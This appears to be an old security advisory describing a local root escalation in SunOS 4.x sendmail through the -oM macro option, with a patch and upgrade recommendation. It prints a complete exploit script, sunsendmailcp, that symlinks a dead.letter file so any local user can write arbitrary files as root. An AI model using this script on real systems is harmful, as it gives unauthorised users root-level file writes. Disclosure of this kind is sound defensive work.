COMMAND

    sendmail(8)

SYSTEMS AFFECTED

    SunOS  4.x  Sendmail  -  all  versions  including  latest   4/5/94
    Sendmail Jumbo Patch 100377-15

    After  further  investigation,  it  has  been discovered that SVR4
    based ports  include sendmail(8)  based on  SMI code.   This  code
    therefore is affected by the problem.

PROBLEM

    Any user on the system can become root.  This cannot be  exploited
    remotely.

    Sun sendmail allows -oM to  set any macro, and still  retains root
    privilege.  The list of 'trusted' macros should be limited.

    1. Create the file sunsendmailcp

    #!/bin/sh
    #
    # sunsendmailcp from to

    if [ $# -ne 2 ]; then
            echo usage: `basename $0` from to
            exit 1
    fi

    rm -f /usr/tmp/dead.letter
    if [ -f /usr/tmp/dead.letter ]; then
            echo sorry, cant continue - /usr/tmp/dead.letter exists
    fi

    if [ ! -r $1 ]; then
            echo $1 doesnt exist or is unreadable
            exit 1
    fi
    ln -s $2 /usr/tmp/dead.letter
    /usr/lib/sendmail -L0 '-oM#anything' $USER < $1
    rm /usr/tmp/dead.letter
    exit 0

    2. Execute the command

        % ./sunsendmailcp sourcefile targetfile

    and target file will either be appended to or created.

SOLUTION

    We  recommend  that  security  conscious sites upgrade immediately
    to UCB Sendmail  8.6.9, as Suns  sendmail is generally  recognised
    as being broken.  Your options are:

    1. Obtain patch from your vendor.

    2. Build and install sendmail 8.6.9, available from:
       ftp.cs.berkeley.edu:/ucb/sendmail/sendmail.8.6.9.*